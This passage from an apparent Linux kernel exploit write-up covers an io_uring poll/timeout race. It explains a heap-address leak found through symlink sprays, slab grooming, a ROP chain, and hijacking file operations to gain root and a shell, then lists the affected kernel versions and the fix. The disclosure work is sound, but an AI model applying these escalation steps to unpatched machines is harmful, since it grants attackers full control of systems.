net->dev_name_head = netdev_create_hash();
if (net->dev_name_head == NULL)
goto err_name;
net->dev_index_head = netdev_create_hash();
if (net->dev_index_head == NULL)
goto err_idx;
RAW_INIT_NOTIFIER_HEAD(&net->netdev_chain);
return 0;
err_idx:
kfree(net->dev_name_head);
err_name:
return -ENOMEM;
}
This results in a ‘two-way’ heap leak. Firstly, it leaks the address of &net->dev_base_head
due to the presence of INIT_LIST_HEAD
. Secondly, net->dev_name_head
, net->dev_index_head
, and net->netdev_chain
are truncated with null bytes, making it possible for us to detect their location. Its possible to detect these changes as long as we spray with a technique that allows us to read back what we sprayed; for example symlinks.
Another thing that helps us is that these two ‘changes’ are at are at different offsets, dev_base_head
is at net+144
and dev_index_head
at net+304
, immediatly revealing the location of some sprayed chunks, 1 and 3 after our original base chunk.
To determine the base chunk, we can utilize dup
to increment our f_count at file+56
. With this adjustment, we can iterate through all the chunks under our control, obtaining the heap leak, and then match these chunks with their symlink indexes.
Initial Spray
With dev_index_head
located at net+304
, the goal is to gain control over ceil(304/92) = 4
consecutive chunks. To do this we first fill up the holes in the current CPU partial list and free some objects on a different CPU, ensuring the slabs of objects we don’t fully control land on another CPU partial list. Only then we can fill up some new slabs and free some objects, so the current CPU partial list is full of slabs of consecutive objects we control.
Because it takes some tries (and time) to trigger the bug it is required to redo this step every n
tries.
Shell
Now to get RIP
control we can free the first chunk and proceed to spray the first part of the ROP chain and repeat the process for the third chunk. Then lastly we also free our base chunk and spray our new f_ops
pointing to our ROP
chain. Finally giving us root.
Now as root its not yet possible to call system("sh")
, because stdin (fd-0
) still points to our dirty file, so lets just free and close it again.. Well, to do this we again need to reallocate our f_ops
to some fops
that does not implement flush
(It probably panics if it does call it), call close(0)
and then dup2(backup_fd_stdin, 0)
.
And finally we have a shell (and hope it doesn’t break within a few seconds because the rbtree
of the timer is most likely still slightly broken).
Affected versions
Even though the bug seemed to be fixed in ~v6.0 (Taken from the 5.10 & 5.15 fix commit):
While reworking the poll hashing in the v6.0 kernel, we ended up grabbing the ctx->uring_lock in poll update/removal. This also fixed a bug with linked timeouts racing with timeout expiry and poll removal. Bring back just the locking fix for that.
My reproducer was still able to crash upstream (Because the uring_lock
was only held selectively).
The final patch just holds the uring_lock
while removing (and completing) a poll request.
Versions 5.13 - 6.4
and 5.10.162 - 5.10.185
were affected.
Patch commits: